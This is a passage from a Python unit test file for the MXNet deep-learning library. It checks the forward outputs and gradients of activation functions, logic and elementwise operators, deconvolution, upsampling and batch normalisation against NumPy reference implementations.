check_numeric_gradient(y, [xa, gam], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_numeric_gradient(y, [xa, gam_full], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam], [np.ones(ya.shape, dtype=dtype)],
[g_xa, g_gam], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam_full], [ya_full], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam_full], [np.ones(ya_full.shape, dtype=dtype)],
[g_xa_full, g_gam_full], rtol=rtol, atol=atol, dtype=dtype)
def test_selu():
alpha = 1.6732632423543772848170429916717
lamb = 1.0507009873554804934193349852946
def fselu(x):
neg_indices = x < 0
out = x.copy()
out[neg_indices] = alpha * np.expm1(out[neg_indices])
return out * lamb
def fselu_grad(grad, x, y):
neg_indices = x < 0
out = np.ones(x.shape).astype(x.dtype)
out[neg_indices] = y[neg_indices] + alpha
return out * lamb
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="selu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 1e-1, 1e-2) if dtype is np.float16 else (1e-4, 1e-2, 1e-4)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fselu(xa)
ga = fselu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape, dtype=dtype)], [ga], rtol=rtol, atol=atol, dtype=dtype)
def test_gelu():
CUBE_CONSTANT = 0.044715
ROOT_TWO_OVER_PI = 0.7978845608028654
def g(x):
return ROOT_TWO_OVER_PI * (x + CUBE_CONSTANT * np.power(x, 3))
def g_grad(x):
return ROOT_TWO_OVER_PI * (1.0 + 3.0 * CUBE_CONSTANT * np.power(x, 2))
def f(x):
return 1.0 + np.tanh(g(x))
def f_grad(x):
return (1.0 - np.tanh(g(x)) * np.tanh(g(x))) * g_grad(x)
def fgelu(x):
return 0.5 * x * f(x)
def fgelu_grad(grad, x, y):
return grad * (y / x + y * (1 - np.tanh(g(x))) * g_grad(x))
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="gelu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 2e-2, 1e-3) if dtype is np.float16 else (1e-4, 1e-3, 1e-5)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fgelu(xa)
ga = fgelu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
def test_sigmoid():
def fsigmoid(a):
return np.divide(1.0, (1.0 + np.exp(-a)))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.sigmoid(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsigmoid(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya * (1 - ya)])
def test_shape_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.shape_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.shape(xa)
yg = mx.nd.ones(ya)
exe = y._bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
def test_size_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.size_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.size(xa)
yg = mx.nd.ones(ya)
exe = y._bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
def test_hard_sigmoid():
def fhardsigmoid(a, alpha=0.2, beta=0.5):
return np.maximum(np.zeros(a.shape, dtype=a.dtype),
np.minimum(np.ones(a.shape, dtype=a.dtype), alpha*a+beta))
def fhardsigmoid_grad(a, out_grad, alpha=0.2, beta=0.5):
orig_out = fhardsigmoid(a, alpha, beta)
res = out_grad * alpha
res[orig_out <= 0.0] = 0.0
res[orig_out >= 1.0] = 0.0
return res
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.hard_sigmoid(x)
for dtype in [np.float16, np.float32, np.float64]:
if dtype is np.float16:
rtol = 1e-2
else:
rtol = 1e-3
atol = 1e-3
eps = 1e-3
xa = np.random.uniform(low=-3.0,high=3.0,size=shape).astype(dtype)
# function not differentiable at x=2.5 and -2.5
xa[abs(xa-2.5) < eps] -= 2 * eps
xa[abs(xa+2.5) < eps] += 2 * eps
ya = fhardsigmoid(xa)
grad_xa = fhardsigmoid_grad(xa, np.ones(shape))
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [grad_xa], rtol=rtol, atol=atol, dtype=dtype)
def test_softsign():
def fsoftsign(a):
return np.divide(a, (1.0 + np.abs(a)))
def fsoftsign_grad(a):
return np.divide(1.0, np.square((1.0 + np.abs(a))))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.softsign(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsoftsign(xa)
ya_grad = fsoftsign_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
def test_binary_logic():
def _inner_test(forward_gt, logic_sym, x_shape, y_shape, test_scalar=True):
x = mx.symbol.Variable("x")
y = mx.symbol.Variable("y")
z = logic_sym(x, y)
x_npy = np.random.randint(0, 4, size=x_shape).astype(np.float32)
y_npy = np.random.randint(0, 4, size=y_shape).astype(np.float32)
exe = z._simple_bind(ctx=default_context(), x=x_shape, y=y_shape)
mx_out = exe.forward(is_train=True, x=x_npy, y=y_npy)[0]
assert_almost_equal(mx_out, forward_gt(x_npy, y_npy))
exe.backward()
if test_scalar:
z_lscalar = logic_sym(1, y)
z_rscalar = logic_sym(x, 1)
exe_lscalar = z_lscalar._simple_bind(ctx=default_context(), y=y_shape)
exe_rscalar = z_rscalar._simple_bind(ctx=default_context(), x=x_shape)
mx_lscalar_out = exe_lscalar.forward(is_train=True, y=y_npy)[0]
mx_rscalar_out = exe_rscalar.forward(is_train=True, x=x_npy)[0]
assert_almost_equal(mx_lscalar_out, forward_gt(1, y_npy))
assert_almost_equal(mx_rscalar_out, forward_gt(x_npy, 1))
exe_lscalar.backward()
exe_rscalar.backward()
# Test the no-broadcasting binary logic ops + scalar logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: x == y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: x > y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: x >= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: x < y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: x <= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: x != y, x_shape=(10, 10), y_shape=(10, 10))
# Test the broadcasting binary logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: mx.sym.broadcast_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: mx.sym.broadcast_greater(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: mx.sym.broadcast_greater_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: mx.sym.broadcast_not_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
def test_unary_logic():
def reference(a, dtype):
return np.logical_not(a).astype(dtype)
shape = (3, 4)
xa = np.random.randint(-2, 2, size=shape).astype(np.float32)
mx_xa = mx.nd.array(xa)
mx_out = mx.nd.logical_not(mx_xa)
assert_almost_equal(mx_out, reference(xa, dtype=xa.dtype))
x = mx.sym.Variable('x')
y = mx.sym.logical_not(data=x)
exe = y._simple_bind(ctx=default_context(), x=shape)
sym_out = exe.forward(is_train=True, x=mx_xa)[0]
assert_almost_equal(sym_out, reference(xa, dtype=xa.dtype))
def test_embedding():
in_dim = 10
out_dim = 4
batch = 24
data = mx.sym.Variable("data")
embed = mx.sym.Embedding(data=data, input_dim=in_dim, output_dim=out_dim, name="embed")
exe_test = embed._simple_bind(default_context(), grad_req={'data': 'null', 'embed_weight': 'write'}, data=(batch,))
arg_map = dict(zip(embed.list_arguments(), exe_test.arg_arrays))
grad_map = dict(zip(embed.list_arguments(), exe_test.grad_arrays))
np_data = np.random.randint(low=0, high=in_dim, size=batch)
np_weight = np.random.uniform(-0.01, 0.01, arg_map["embed_weight"].shape)
np_onehot = np.zeros((batch, in_dim))
np_onehot[np.arange(batch), np_data] = 1.0
# forward
arg_map["data"][:] = np_data
arg_map["embed_weight"][:] = np_weight
exe_test.forward(is_train=True)
# Non-zero atol required, as exposed by seed 781663739
rtol = 1e-5
atol = 1e-5
assert_almost_equal(exe_test.outputs[0], np.dot(np_onehot, np_weight), rtol=rtol, atol=atol)
# backward
np_grad = np.random.uniform(-1, 1, exe_test.outputs[0].shape)
grad = mx.nd.zeros(np_grad.shape)
grad[:] = np_grad
exe_test.backward([grad])
assert_almost_equal(grad_map["embed_weight"], np.dot(np_onehot.T, np_grad), rtol=rtol, atol=atol)
# check ops handle duplicate input correctly.
def test_binary_op_duplicate_input():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = 5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
out_grad = mx.nd.empty(shape)
out_grad[:] = 1
square = data * data
exe_square = square._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_square.forward(is_train=True)
assert_almost_equal(exe_square.outputs[0], data_tmp * data_tmp)
exe_square.backward(out_grad)
assert_almost_equal(arr_grad, 2.0 * data_tmp)
def test_sign():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.sign(data)
exe_test = test._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.sign(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2;
npout_grad = out_grad.asnumpy()
npout_grad = 0;
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def test_round_ceil_floor():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5.543
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]= 2
test = mx.sym.round(data) + mx.sym.ceil(data) + mx.sym.floor(data)
exe_test = test._bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.round(data_tmp) + np.ceil(data_tmp) + np.floor(data_tmp)
assert_almost_equal(out, npout)
def test_trunc():
data_tmp = np.random.rand(3, 4) * 10 - 5
arr_data = mx.nd.array(data_tmp)
data = mx.symbol.Variable('data')
test = mx.sym.trunc(data)
exe_test = test._bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
# 'trunc' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
# Repro issue with seed 1660190454
npout = np.trunc(np.float32(data_tmp))
assert_almost_equal(out, npout)
def test_rsqrt_cos_sin():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.rsqrt(data) + mx.sym.cos(data) + mx.sym.sin(data)
exe_test = test._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = 1/ np.sqrt(data_tmp) + np.cos(data_tmp) + np.sin(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * -(1.0 / (2.0 * data_tmp * np.sqrt(data_tmp))) + npout_grad * -1 * np.sin(data_tmp) + npout_grad * np.cos(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def test_maximum_minimum():
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp2 = np.random.rand(3,4)
data_tmp1[:] = 2
data_tmp2[:] = 3
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,data2) + mx.sym.minimum(data1,data2)
exe_test = test._bind(default_context(), args=[arr_data1,arr_data2], args_grad=[arr_grad1,arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,data_tmp2) + np.minimum(data_tmp1,data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > data_tmp2).astype('float')
mask2 = (data_tmp1 < data_tmp2).astype('float')
npout_grad1 = npout_grad * mask1 + npout_grad * mask2
npout_grad2 = (npout_grad - npout_grad * mask1) + (npout_grad - npout_grad * mask2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
def test_maximum_minimum_scalar():
data1 = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp1[:] = 2
arr_data1 = mx.nd.array(data_tmp1)
arr_grad1 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,3) + mx.sym.maximum(9,data1) + mx.sym.minimum(5,data1) + mx.sym.minimum(data1,4)
exe_test = test._bind(default_context(), args=[arr_data1], args_grad=[arr_grad1])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,3) + np.maximum(9,data_tmp1) + np.minimum(5,data_tmp1) + np.minimum(data_tmp1,4)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > 3).astype('float')
mask2 = (9 > data_tmp1).astype('float')
mask3 = (5 < data_tmp1).astype('float')
mask4 = (data_tmp1 < 4).astype('float')
npout_grad1 = npout_grad * mask1 + (npout_grad - npout_grad * mask2) + (npout_grad - npout_grad * mask3) + npout_grad * mask4
assert_almost_equal(arr_grad1, npout_grad1)
def test_abs():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.abs(data)
exe_test = test._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = abs(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2;
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * np.sign(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def check_deconvolution_forward_backward(input_shape, num_filter, kernel, stride, pad):
"""configure A: input --> conv --> deconv --> output.
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output, and the same weights between conv
and deconv;
If the input value of forward() and backwrad() is the same, then
the output value of them should also the same;
"""
assert input_shape[1] == num_filter
data = mx.sym.Variable(name="data")
conv = mx.sym.Convolution(
data=data, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
deconv = mx.sym.Deconvolution(
data=conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
input_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
out_grad = input_data
args = {}
args["data"] = input_data
args['conv_weight'] = args['deconv_weight'] = mx.random.normal(0, 1,
(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
args_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = deconv._bind(default_context(), args=args, args_grad=args_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
exe.backward(out_grad)
assert_almost_equal(out, args_grad[0], rtol=1E-3, atol=1e-3)
args_grad_addto_npy = [np.random.normal(size=s) for s in arg_shapes]
args_grad_addto = [mx.nd.array(ele) for ele in args_grad_addto_npy]
exe = deconv._bind(default_context(), args=args, args_grad=args_grad_addto, grad_req="add")
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(out_grad)
assert_almost_equal(out + args_grad_addto_npy[0], args_grad_addto[0].asnumpy(), rtol=1e-3, atol=1e-3)
def check_deconvolution_gradient(input_shape, num_filter, pad):
"""configure A: input --> conv --> output.
configure B: input --> deconv --> output
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output;
During backward(), if the input of A equals output of B, and the output
of A equals input of B, then the grad of weight should be the same;
"""
ndim = len(pad)
stride = (1,) * ndim
kernel = tuple(2 * np.array(pad) + 1)
data_conv = mx.sym.Variable(name="data_conv")
conv = mx.sym.Convolution(
data=data_conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
data_deconv = mx.sym.Variable(name="data_deconv")
deconv = mx.sym.Deconvolution(
data=data_deconv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
conv_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
conv_args = {}
conv_args["data_conv"] = conv_data
conv_args['conv_weight'] = \
mx.random.normal(0, 1,(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
conv_args_grad = [mx.nd.zeros(conv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
exe_conv = conv._bind(default_context(), args=conv_args, args_grad=conv_args_grad)
exe_conv.forward(is_train=True)
conv_out_grad = mx.random.normal(0, 2, exe_conv.outputs[0].shape, ctx=mx.cpu()).copyto(default_context())
exe_conv.backward(conv_out_grad)
deconv_data = conv_out_grad
deconv_args = {}
deconv_args['data_deconv'] = deconv_data
deconv_args['deconv_weight'] = conv_args['conv_weight']
deconv_args_grad = [mx.nd.zeros(deconv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad_npy = [np.random.normal(size=deconv_data.shape),
np.random.normal(size=(num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad = [mx.nd.array(deconv_addto_args_grad_npy[0]),
mx.nd.array(deconv_addto_args_grad_npy[1])]
exe_deconv = deconv._bind(default_context(), args=deconv_args, args_grad=deconv_args_grad)
exe_deconv.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1], deconv_args_grad[1], rtol=1e-3, atol=1e-2)
# Test AddTo
exe_deconv_addto = deconv._bind(default_context(), args=deconv_args,
args_grad=deconv_addto_args_grad,
grad_req="add")
exe_deconv_addto.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv_addto.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1].asnumpy() + deconv_addto_args_grad_npy[1],
deconv_addto_args_grad[1].asnumpy(), rtol=1e-3, atol=1e-2)
def check_deconvolution_target_shape(input_shape, kernel, stride, pad, adj, target_shape=None):
data = mx.sym.Variable(name="data")
if target_shape:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5,
target_shape = target_shape)
else:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5)
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
default_target_size = 8
if target_shape is None:
target_shape = (default_target_size,) * len(kernel)
assert out_shapes[0] == (input_shape[0], 5) + target_shape
@pytest.mark.serial
def test_deconvolution():
# 2D
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
target_shape = (8,8),
pad = (99,99), # will be ignored
adj = (101,101), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
pad = (1,1),
adj = (1,1),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5,5),
num_filter = 1,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28,28),
num_filter = 3,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403, 403),
num_filter = 3,
kernel = (7,7),
stride = (5,5),
pad = (2,2)
)
check_deconvolution_gradient(
input_shape = (1,3,5,5),
num_filter = 3,
pad = (1,1)
)
check_deconvolution_gradient(
input_shape = (5,3,100,100),
num_filter = 3,
pad = (3,3)
)
# 1D
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
target_shape = (8,),
pad = (99,), # will be ignored
adj = (101,), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
pad = (1,),
adj = (1,),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5),
num_filter = 1,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28),
num_filter = 3,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403),
num_filter = 3,
kernel = (7,),
stride = (5,),
pad = (2,)
)
check_deconvolution_gradient(
input_shape = (1,3,5),
num_filter = 3,
pad = (1,)
)
check_deconvolution_gradient(
input_shape = (5,3,100),
num_filter = 3,
pad = (3,)
)
def test_deconvolution_forward_with_bias():
"""Check if deconvolution forward can work well with bias=True
"""
def check_deconvolution_forward_with_bias(shape=(1, 16, 5, 5), num_filter=32, num_group=1, kernel=(3, 3), pad=(1, 1)):
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
input_data = mx.random.uniform(-5, 5, shape, ctx=mx.cpu())
y = mx.sym.Deconvolution(data=x, weight=w, num_filter=num_filter, num_group=num_group, kernel=kernel, no_bias=False, pad=pad)
exe = y._simple_bind(ctx=mx.cpu(), x=shape, grad_req='null')
exe.arg_arrays[0][:] = np.random.normal(size=exe.arg_arrays[0].shape)
exe.arg_arrays[1][:] = np.random.normal(size=exe.arg_arrays[1].shape)
exe.forward(is_train=False)
o = exe.outputs[0]
t = o.asnumpy()
check_deconvolution_forward_with_bias((1, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((32, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((1, 16, 5, 5), 32, 1, (3, 3), (1, 1))
check_deconvolution_forward_with_bias((32, 16, 5, 5), 32, 1, (3, 3), (1, 1))
def check_nearest_upsampling_with_shape(shapes, scale, root_scale):
arr = {'arg_%d'%i: mx.random.uniform(-10.0, 10.0, shape, ctx=mx.cpu()).copyto(default_context()) for i, shape in zip(range(len(shapes)), shapes)}
arr_grad = {'arg_%d'%i: mx.nd.zeros(shape) for i, shape in zip(range(len(shapes)), shapes)}
up = mx.sym.UpSampling(*[mx.sym.Variable('arg_%d'%i) for i in range(len(shapes))], sample_type='nearest', scale=root_scale)
exe = up._bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
exe.backward(exe.outputs)
for k in range(len(shapes)):
name = 'arg_%d'%k
assert_allclose(arr[name].asnumpy()*root_scale**2*scale**(2*k), arr_grad[name].asnumpy(), rtol=1e-4)
def check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter):
def _init_bilinear(arr, f):
weight = np.zeros(np.prod(arr.shape), dtype='float32')
shape = arr.shape
c = (2 * f - 1 - f % 2) / (2. * f)
for i in range(np.prod(shape)):
x = i % shape[3]
y = (i // shape[3]) % shape[2]
weight[i] = (1 - abs(x / f - c)) * (1 - abs(y / f - c))
arr[:] = weight.reshape(shape)
return arr
up = mx.sym.UpSampling(mx.sym.Variable("data"),
mx.sym.Variable('weight'), sample_type='bilinear', scale=root_scale,
num_filter=num_filter, num_args=2)
arg_shapes, out_shapes, _ = up.infer_shape(data=data_shape)
arr = {'data': mx.random.uniform(-5, 5, data_shape, ctx=mx.cpu()).copyto(default_context()),
'weight': mx.nd.array(_init_bilinear(mx.ndarray.empty(arg_shapes[1]).asnumpy(), root_scale))}
arr_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = up._bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(exe.outputs)
target_shape = (data_shape[2] * root_scale, data_shape[3] * root_scale)
assert out.shape == data_shape[:2] + target_shape
def test_nearest_upsampling():
for root_scale in [1,2,3]:
for scale in [1,2,3]:
for num_shape in [1,2,3]:
for base in [1,2,3]:
shapes = [(1,3,base*root_scale*scale**(num_shape-1-i),base*root_scale*scale**(num_shape-1-i)) for i in range(num_shape)]
check_nearest_upsampling_with_shape(shapes, scale, root_scale)
def test_bilinear_upsampling():
rootscale = [2,3]
scales = [1,2,3]
filters = [1,2,3]
bases = [1,2,3]
for params in itertools.product(rootscale, scales, filters, bases):
root_scale, scale, num_filter, base = params
# bilinear upsampling takes only 1 data and 1 weight
# multi input mode is not applicable
dimension = base*root_scale*scale
kernel = 2 * root_scale - root_scale % 2
data_shape = (1, num_filter, dimension, dimension)
weight_shape = (1, num_filter, kernel, kernel)
check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter)
def test_batchnorm_training():
def check_batchnorm_training(stype):
for shape in [(2, 3), (2, 3, 2, 2), (2, 8, 2, 2)]:
data_tmp = np.random.normal(-0.1, 0.1, size=shape)
s = shape[1],
gamma = np.ones(s)
beta = np.ones(s)
gamma[1] = 3
beta[0] = 3
rolling_mean = np.random.uniform(size=s)
rolling_std = np.random.uniform(size=s)
data = mx.symbol.Variable('data', stype=stype)
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
mean_std = [mx.nd.array(rolling_mean).tostype(stype), mx.nd.array(rolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
# Test varying channel axis
dim = len(shape)
for chaxis in range(-dim, dim):
chaxis_true = chaxis
if chaxis < 0:
chaxis_true = dim + chaxis
shapex = shape
channel_count = shapex[chaxis_true]
data_tmp = np.random.normal(-0.1, 0.1, size=shapex)
gamma = np.ones(channel_count)
beta = np.ones(channel_count)
if channel_count > 1:
gamma[1] = 3
beta[0] = 3
